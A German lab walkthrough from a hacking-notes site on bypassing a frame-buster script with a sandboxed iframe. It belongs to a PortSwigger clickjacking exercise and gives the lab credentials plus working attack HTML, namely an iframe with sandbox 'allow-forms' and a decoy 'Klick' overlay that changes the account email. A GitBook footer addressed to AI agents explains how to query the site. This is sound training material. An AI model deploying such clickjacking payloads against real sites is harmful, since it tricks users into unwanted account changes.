> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/clickjacking/clickjacking-with-frame-buster-script.md).

# Clickjacking mit Anti-Frame-Skript

### Clickjacking mit einem Frame-Buster-Skript

Führen Sie einen Clickjacking-Angriff durch, der die E-Mail-Adresse des Benutzers trotz eines „Frame-Busters“ ändert. Das Lab ist gelöst, wenn die Kontoe-Mail-Adresse geändert wurde.

#### Bereitgestellte Zugangsdaten

* Benutzer: `wiener`
* Passwort: `peter`

#### Anfängliche Feststellung

Beim Versuch, die Kontoseite in einem klassischen `<iframe>`, gibt die Seite den folgenden Inhalt zurück (Beispiel d

{% code overflow="wrap" %}

```html
<iframe src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=wiener"</iframe>
```

{% endcode %}

<figure><img src="/files/a0e9fdc703c1b771c76616df4ee80786d5fccd0c" alt=""><figcaption></figcaption></figure>

#### Beobachteter Schutz (Frame-Buster)

Die Seite enthält ein Skript, das das Einbetten in einen Frame verhindert und den Inhalt des Dokuments ersetzt, wenn die Seite in einem Frame geladen wird:

```javascript
if(top != self) {
 window.addEventListener("DOMContentLoaded", function() {
 document.body.innerHTML = 'Diese Seite kann nicht in einem Frame angezeigt werden';
 }, false);
}
```

Dieser Mechanismus erkennt, wenn sich die Seite in einem iframe befindet, und neutralisiert den angezeigten Inhalt.

{% code overflow="wrap" %}

```html
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=jordan@hacked.com"</iframe>
```

{% endcode %}

<figure><img src="/files/beb52f72ea0a362a4e7617c2c2042cee84394055" alt=""><figcaption></figcaption></figure>

Beispiel für den verwendeten Stil und die Täuschungsebene

```javascript
<style>
iframe{
width: 500px;
height: 600px;
}
div{
position: relative;
top: 455px;
left: 80px;
}
</style>
<div>Klick</div>
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=jordan@hacked.com"</iframe>
```

<figure><img src="/files/7d5f0396b4ff5b3b025af4be02a703cb49d95214" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/clickjacking/clickjacking-with-frame-buster-script.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
